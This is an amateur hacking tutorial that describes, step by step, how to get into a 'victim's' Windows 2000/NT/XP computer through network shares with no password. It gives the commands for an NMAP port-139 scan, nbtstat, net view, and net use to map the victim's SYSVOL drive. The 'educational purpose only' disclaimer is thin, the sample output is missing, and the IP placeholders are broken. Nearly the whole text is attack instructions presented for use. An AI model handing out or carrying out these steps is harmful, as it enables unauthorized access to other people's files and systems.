This is for educational purpose only, this hack works with unpatched version of Windows 2000/NT/XP. (only works if the shared drive that has no password set by administrator)

Step 1:
-Get a IP (range) scanner. (NMAP is a fast one)
-Scan the victim's ip on TCP/IP port 139

Step 1.1
-Open a dos prompt
-Do this by going to start/run
-Type cmd
When you are already in DOS command prompt type
-NMAP -v -p 139 88.207.1.1-100 (example target ip range)
-when you got an open port proceed to step 2

Step 2
This is what you need to type down:
Replace 255.255.255.255 with the victims IP address.

c:\windows>nbtstat -a 255.255.255.255

If you see this your in:



Step 3
type down:

c:\windows>net view \\255.255.255. 255



Step 4
type down:
c:\windows>net use x: \\255.255.255. 255\SYSVOL
(you can replace x: by anything letter you want but not your own drive
letters.)

Note:SYSVOL is the name of the shared harddrive.

If the command is successful we will get the confirmation.

The command was completed successfullly.

Bingo your inside the system now..

You can now execute any dos command e.g. x:\dir
(you will experience a lag in the system since it is a remote computer)

Now open windows explorer or just double click on the My Computer icon
on your desktop and you will see a new network drive X:\> . Now your are a
hacker.